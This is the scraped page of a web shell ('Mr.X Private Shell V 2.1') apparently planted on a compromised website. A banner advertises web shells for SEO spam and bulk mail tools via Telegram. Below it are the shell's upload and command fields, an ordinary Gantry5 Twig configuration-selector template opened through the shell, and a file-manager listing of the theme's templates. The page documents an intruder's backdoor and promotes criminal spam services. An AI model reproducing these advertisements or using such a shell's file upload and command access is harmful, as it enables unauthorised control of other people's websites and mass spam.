__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<optgroup label="{{ 'GANTRY5_PLATFORM_GLOBAL_DEFAULTS'|trans }}">
    <option value="default"
            {% if configuration == 'default' %}selected="selected"{% endif %}
            data-data="{{ {params: {navbar: true}, url: gantry.route('configurations/default', configuration_page|default('styles'))}|json_encode|e('html_attr') }}">
        {{ 'GANTRY5_PLATFORM_BASE_OUTLINE'|trans }}
    </option>
</optgroup>

{% set user_conf = gantry.outlines.user %}
{% if user_conf.count %}
    <optgroup label="{{ 'GANTRY5_PLATFORM_THEME_OUTLINES'|trans }}">
        {% for name, title in user_conf %}
            {% if name == configuration %}
                {% set selected_title = title %}
                {% set selected_value = name %}
            {% endif %}
            <option value="{{ name }}"
                    {% if name == configuration %}selected="selected"{% endif %}
                    data-data="{{ {params: {navbar: true}, url: gantry.route('configurations', name|e, configuration_page|default('layout'))}|json_encode|e('html_attr') }}"
            >
                {{ title }}
            </option>
        {% endfor %}
    </optgroup>
{% endif %}

{% set system_conf = gantry.outlines.system %}
{% if system_conf.count %}
    <optgroup label="{{ 'GANTRY5_PLATFORM_SYSTEM_OUTLINES'|trans }}">
        {% for name, title in system_conf %}
            {% if name == configuration %}
                {% set selected_title = title %}
                {% set selected_value = name %}
                {% set selected_editable = false %}
            {% endif %}
            <option value="{{ name }}"
                    {% if name == configuration %}selected="selected"{% endif %}
                    data-data="{{ {params: {navbar: true}, url: gantry.route('configurations', name|e, configuration_page|default('layout'))}|json_encode|e('html_attr') }}"
            >
                {{ title }}
            </option>
        {% endfor %}
    </optgroup>
{% endif %}

Filemanager

Name Type Size Permission Actions
ajax.html.twig File 626 B 0664
base.html.twig File 2.3 KB 0664
configuration-selector.html.twig File 1.54 KB 0664
field.html.twig File 1.27 KB 0664
gantry-details.html.twig File 6.34 KB 0664
header.html.twig File 4.77 KB 0664
js-translations.html.twig File 3.08 KB 0664
layout.html.twig File 1.42 KB 0664
navigation.html.twig File 6.85 KB 0664
outlines-list.html.twig File 1.93 KB 0664
page.html.twig File 781 B 0664
php_unsupported.html.twig File 269 B 0664
updates.html.twig File 977 B 0664
Filemanager